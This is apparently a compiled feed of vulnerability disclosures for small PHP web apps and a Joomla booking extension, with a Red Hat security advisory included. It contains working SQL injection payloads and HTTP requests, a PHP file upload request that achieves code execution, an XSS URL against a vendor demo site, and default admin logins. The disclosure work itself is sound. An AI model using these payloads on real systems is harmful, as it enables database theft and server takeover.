Online Pet Shop We App v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /pet_shop/admin/?page=inventory/manage_inventory.

Permalink

**Online Pet Shop We App v1.0 by oretnom23 has SQL injection**

BUG\_Author: hegeoo

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14839/online-pet-shop-we-app-using-php-and-paypal-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /pet\_shop/admin/?page=inventory/manage\_inventory&id=

Vulnerability location: /pet\_shop/admin/?page=inventory/manage\_inventory&id=,id

dbname=pet\_shop\_db,length=11

\[+\] Payload: /pet\_shop/admin/?page=inventory/manage\_inventory&id=8%27%20and%20length(database())%20=11--+ // Leak place ---> id

GET /pet\_shop/admin/?page\=inventory/manage\_inventory&id\=8%27%20and%20length(database())%20\=11\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=k8u390ikl968phg971gmpmhtj5
Connection: close

length=11 

length=12

CVE-2022-41378: bug_report/SQLi-1.md at main · hegeoo/bug_report

Online Diagnostic Lab Management System v1.0 is vulnerable to SQL Injection via /diagnostic/editclient.php?id=.

**Online Diagnostic Lab Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: f0ward

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /diagnostic/editclient.php?id=

Vulnerability location: /diagnostic/editclient.php?id=, id

dbname = diagnostic

\[+\] Payload: /diagnostic/editclient.php?id=-1%27%20union%20select%201,database(),3,4,5,6,7,8--+ // Leak place ---> id

GET /diagnostic/editclient.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6,7,8\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=flklolh755oivesj89eu5fo2c7
Connection: close

CVE-2022-42073: bug_report/SQLi-1.md at main · f0w4rD/bug_report

Online Diagnostic Lab Management System v1.0 is vulnerable to SQL Injection via /diagnostic/editcategory.php?id=.

Permalink

**Online Diagnostic Lab Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: f0ward

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /diagnostic/editcategory.php?id=

Vulnerability location: /diagnostic/editcategory.php?id=, id

dbname = diagnostic

\[+\] Payload: /diagnostic/editcategory.php?id=-1%27%20union%20select%201,database(),3,4--+ // Leak place ---> id

GET /diagnostic/editcategory.php?id\=\-1%27%20union%20select%201,database(),3,4\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=flklolh755oivesj89eu5fo2c7
Connection: close

CVE-2022-42074: bug_report/SQLi-2.md at main · f0w4rD/bug_report

Two cross-site scripting vulnerabilities were fixed in Bodhi 5.6.1.

CVE-2020-15855: bodhi Changelog - pyup.io

An arbitrary file upload vulnerability in the component /php_action/editFile.php of Online Diagnostic Lab Management System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

**Online Diagnostic Lab Management System v1.0 by mayuri\_k has arbitrary code execution (RCE)**

BUG\_Author: Via

vendors: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability url: ip/diagnostic/php\_action/editFile.php?id=1

Loophole location: Online Diagnostic Lab Management System's editFile.php file exists arbitrary file upload (RCE)

Request package for file upload：

POST /diagnostic/php\_action/editFile.php?id\=1 HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.88/diagnostic/editorder.php?id=1
Cookie: PHPSESSID=flklolh755oivesj89eu5fo2c7
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------269801976022857
Content-Length: 431
\-----------------------------269801976022857
Content-Disposition: form-data; name="old\_image"
Z614.pdf
\-----------------------------269801976022857
Content-Disposition: form-data; name="productImage"; filename="se.php"
Content-Type: application/octet-stream
<?php phpinfo(); ?>
\-----------------------------269801976022857
Content-Disposition: form-data; name="btn"
\-----------------------------269801976022857--

The files will be uploaded to this directory \\diagnostic\\assets\\myimages\\

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-41512: bug_report/RCE-1.md at main · TGAyouman/bug_report

Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/ajax.php?action=delete_payment.

Permalink

Cannot retrieve contributors at this time

**Open Source SACCO Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Via

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15372/open-source-sacco-management-system-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /sacco\_shield/ajax.php?action=delete\_payment

Vulnerability location: /sacco\_shield/ajax.php?action=delete\_payment, id

dbname = sacco,length=5

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /sacco\_shield/ajax.php?action\=delete\_payment HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-41515: bug_report/SQLi-2.md at main · TGAyouman/bug_report

Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/ajax.php?action=delete_loan.

Permalink

Cannot retrieve contributors at this time

**Open Source SACCO Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Via

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15372/open-source-sacco-management-system-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /sacco\_shield/ajax.php?action=delete\_loan

Vulnerability location: /sacco\_shield/ajax.php?action=delete\_loan, id

dbname = sacco,length=5

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /sacco\_shield/ajax.php?action\=delete\_loan HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-41514: bug_report/SQLi-1.md at main · TGAyouman/bug_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /diagnostic/edittest.php.

**Online Diagnostic Lab Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Via

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /diagnostic/edittest.php?id=

Vulnerability location: /diagnostic/edittest.php?id=, id

dbname = diagnostic

\[+\] Payload: /diagnostic/edittest.php?id=-1%27%20union%20select%201,database(),3,4,5,6,7,8,9--+ // Leak place ---> id

GET /diagnostic/edittest.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6,7,8,9\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=flklolh755oivesj89eu5fo2c7
Connection: close

CVE-2022-41513: bug_report/SQLi-1.md at main · TGAyouman/bug_report

Red Hat Security Advisory 2022-6835-01 - This release of Red Hat Integration - Service registry 2.3.0.GA serves as a replacement for 2.0.3.GA, and includes the below security fixes. Issues addressed include code execution, cross site scripting, denial of service, deserialization, and privilege escalation vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Service Registry (container images) release and security update [2.3.0.GA]  
Advisory ID:       RHSA-2022:6835-01  
Product:           Red Hat Integration  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6835  
Issue date:        2022-10-06  
CVE Names:         CVE-2021-22569 CVE-2021-37136 CVE-2021-37137  
                   CVE-2021-41269 CVE-2022-0235 CVE-2022-0536  
                   CVE-2022-0981 CVE-2022-21724 CVE-2022-23647  
                   CVE-2022-24771 CVE-2022-24772 CVE-2022-24773  
                   CVE-2022-25647 CVE-2022-25857 CVE-2022-25858  
                   CVE-2022-26520 CVE-2022-31129 CVE-2022-37734  
====================================================================  
1. Summary:

An update to the images for Red Hat Integration Service Registry is now  
available from the Red Hat Container Catalog. The purpose of this text-only  
errata is to inform you about the security issues fixed in this release.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

This release of Red Hat Integration - Service registry 2.3.0.GA serves as a  
replacement for 2.0.3.GA, and includes the below security fixes.

Security Fix(es):

* cron-utils: template Injection leading to unauthenticated Remote Code  
Execution (CVE-2021-41269)

* prismjs: improperly escaped output allows a XSS (CVE-2022-23647)

* snakeyaml: Denial of Service due missing to nested depth limitation for  
collections (CVE-2022-25857)

* moment: inefficient parsing algorithm resulting in DoS (CVE-2022-31129)

* moment: inefficient parsing algorithm resulting in DoS (CVE-2022-31129)

* protobuf-java: potential DoS in the parsing procedure for binary data  
(CVE-2021-22569)

* quarkus: privilege escalation vulnerability with RestEasy Reactive scope  
leakage in Quarkus (CVE-2022-0981)

* quarkus-jdbc-postgresql-deployment: jdbc-postgresql: Unchecked Class  
Instantiation when providing Plugin Classes (CVE-2022-21724)

* netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may  
buffer skippable chunks in an unnecessary way (CVE-2021-37137)

* netty-codec: Bzip2Decoder doesn't allow setting size restrictions for  
decompressed data (CVE-2021-37136)

* node-fetch: exposure of sensitive information to an unauthorized actor  
(CVE-2022-0235)

* follow-redirects: Exposure of Sensitive Information via Authorization  
Header leak (CVE-2022-0536)

* jdbc-postgresql: postgresql-jdbc: Arbitrary File Write Vulnerability  
(CVE-2022-26520)

* node-forge: Signature verification leniency in checking `digestAlgorithm`  
structure can lead to signature forgery (CVE-2022-24771)

* node-forge: Signature verification failing to check tailing garbage bytes  
can lead to signature forgery (CVE-2022-24772)

* node-forge: Signature verification leniency in checking `DigestInfo`  
structure (CVE-2022-24773)

* com.google.code.gson-gson: Deserialization of Untrusted Data in  
com.google.code.gson-gson (CVE-2022-25647)

* terser: insecure use of regular expressions leads to ReDoS  
(CVE-2022-25858)

* graphql-java: DoS by malicious query (CVE-2022-37734)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data  
2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way  
2024632 - CVE-2021-41269 cron-utils: template Injection leading to unauthenticated Remote Code Execution  
2039903 - CVE-2021-22569 protobuf-java: potential DoS in the parsing procedure for binary data  
2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor  
2050863 - CVE-2022-21724 jdbc-postgresql: Unchecked Class Instantiation when providing Plugin Classes  
2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak  
2056643 - CVE-2022-23647 prismjs: improperly escaped output allows a XSS  
2062520 - CVE-2022-0981 quarkus: privilege escalation vulnerability with RestEasy Reactive scope leakage in Quarkus  
2064007 - CVE-2022-26520 postgresql-jdbc: Arbitrary File Write Vulnerability  
2067387 - CVE-2022-24771 node-forge: Signature verification leniency in checking `digestAlgorithm` structure can lead to signature forgery  
2067458 - CVE-2022-24772 node-forge: Signature verification failing to check tailing garbage bytes can lead to signature forgery  
2067461 - CVE-2022-24773 node-forge: Signature verification leniency in checking `DigestInfo` structure  
2080850 - CVE-2022-25647 com.google.code.gson-gson: Deserialization of Untrusted Data in com.google.code.gson-gson  
2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS  
2126277 - CVE-2022-25858 terser: insecure use of regular expressions leads to ReDoS  
2126789 - CVE-2022-25857 snakeyaml: Denial of Service due to missing nested depth limitation for collections  
2126809 - CVE-2022-37734 graphql-java: DoS by malicious query

5. References:

https://access.redhat.com/security/cve/CVE-2021-22569  
https://access.redhat.com/security/cve/CVE-2021-37136  
https://access.redhat.com/security/cve/CVE-2021-37137  
https://access.redhat.com/security/cve/CVE-2021-41269  
https://access.redhat.com/security/cve/CVE-2022-0235  
https://access.redhat.com/security/cve/CVE-2022-0536  
https://access.redhat.com/security/cve/CVE-2022-0981  
https://access.redhat.com/security/cve/CVE-2022-21724  
https://access.redhat.com/security/cve/CVE-2022-23647  
https://access.redhat.com/security/cve/CVE-2022-24771  
https://access.redhat.com/security/cve/CVE-2022-24772  
https://access.redhat.com/security/cve/CVE-2022-24773  
https://access.redhat.com/security/cve/CVE-2022-25647  
https://access.redhat.com/security/cve/CVE-2022-25857  
https://access.redhat.com/security/cve/CVE-2022-25858  
https://access.redhat.com/security/cve/CVE-2022-26520  
https://access.redhat.com/security/cve/CVE-2022-31129  
https://access.redhat.com/security/cve/CVE-2022-37734  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYz7stNzjgjWX9erEAQiCEQ/+OPmlKRufUR1D+rRvhWHeBMxdJ9NMoaMm  
rV3uH/FIiBLFSYWXgTY8gb53BVsZHEPfZ6G3ol70iyOjDbXazQsYBuhg/9RMLmz9  
+J1yK5sSeE9HyisYbYdHuuGIKpEMGXp78NP1rlwBEgyFrkY8pJHSdv/Fc87f2B3Z  
VeExd/Zvdcj5M4/ZmCin1yNALPKlhnbp9+9MGvcLufJUsXxOKPrQVCYMgWVWc0Wc  
aNRm4y8FBOnYrB9FeA2BBYEpmBrRK8G8OsoebuqaBvKAvytVV/NSiOMKsdaGD9WL  
XeLPl5XE3rpEVeUEH4aEjdHe6weLk/sjst335xgWI7QHZT/gjZxmxza2TBGgIkRJ  
yBT/n63geWAkaTXUCP0oepJDPKAio6B/CFVzTZS8jqO/0rDDvHIZN94nhceqamW3  
GC5gha56Pk+qcw3sArvtu0G72wY5O/+/kxp0mV+sWczIIlbS7FlkG+sxl5uHo3+M  
DDBOMwNROI6bInBxnBD4GWMepW40cGaAXt1HN/1NVaZq0mw4cdyulOMJfPpJGQK5  
IGS+TnvZn86p3cZysR3eMuaPzFG9U8vnaAw8enRmiJ6wG3NFkklIRelO7fEF8n3R  
drGnqa8gB589c9x3QUurBytdDxYWd2T71TOTyMFdTI9NtOAeuIvX+6lDj0BOftH3  
Jnw+PamuYNcÌnF  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6835-01

Joomla Vik Booking extension version 1.15.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : e4j Extensions for Joomla - extensionsforjoomla.com                        ││  Software : Joomla Vik Booking 1.15.0                                                  ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.php/en/bookingGET parameter 'categories' is vulnerable to XSShttps://extensionsforjoomla.com/livedemo/vikbooking/index.php/en/booking?option=com_vikbooking&task=showprc&roomsnum=1&roomopt%5B%5D=9&adults%5B%5D=2&children%5B%5D=1&days=1&checkin=1665057600&checkout=1665136800&category_id=&categories=rnrtm%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ew3vus&Itemid=103[-] Done

Tag

#sql